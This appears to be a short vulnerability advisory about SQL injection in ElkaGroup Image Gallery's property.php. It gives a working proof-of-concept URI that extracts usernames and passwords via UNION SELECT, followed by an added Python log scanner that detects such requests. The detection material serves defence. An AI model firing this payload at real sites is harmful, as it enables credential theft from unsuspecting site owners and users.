ElkaGroup Image Gallery Property.PHP SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URI is available.

http://www.example.com/SCRIPT_PATH/property.php?cid=9&uid=0&pid=-1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,concat(username,0x3A,userpassword),9,10,11,12,13,14,15,16,17%20from%20users
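For defenders, requests like the one above can be picked out of web server access logs. The following is an added example, not part of the original advisory or of the vendor's code: it flags requests to property.php whose cid, uid or pid value is not a plain non-negative integer. Treating those three parameters as integer IDs is an assumption based on the values in the URI, and the log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters shown in the advisory's URI; treating them as integer IDs is an assumption.
NUMERIC_PARAMS = ("cid", "uid", "pid")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SQL_HINT_RE = re.compile(r"\b(union|select|concat|from)\b", re.I)

def inspect_request(target):
    """Return (param, decoded_value, reason) findings for one request target."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/property.php"):
        return []
    findings = []
    # parse_qs percent-decodes values, so %20UNION%20 is seen as " UNION ".
    query = parse_qs(parts.query, keep_blank_values=True)
    for name in NUMERIC_PARAMS:
        for value in query.get(name, []):
            if re.fullmatch(r"\d+", value):
                continue  # plain integer ID, nothing to report
            reason = "sql-keywords" if SQL_HINT_RE.search(value) else "non-integer"
            findings.append((name, value, reason))
    return findings

def scan_log(lines):
    """Yield (line_number, findings) for access-log lines with suspicious parameters."""
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            findings = inspect_request(match.group(1))
            if findings:
                yield number, findings

# Constructed sample lines in combined log format, not taken from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /gallery/property.php?cid=9&uid=0&pid=42 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [01/Jan/2010:10:00:05 +0000] "GET /gallery/property.php?cid=9&uid=0&pid=-1%20UNION%20ALL%20SELECT%201,2 HTTP/1.1" 200 6100',
    '192.0.2.10 - - [01/Jan/2010:10:00:09 +0000] "GET /gallery/index.php?pid=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, findings in scan_log(SAMPLE_LOG):
        print(number, findings)
```

A hit with reason `non-integer` alone may be a malformed link rather than an attack; `sql-keywords` hits are the ones to triage first.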


 

Copyright 2010, SecurityFocus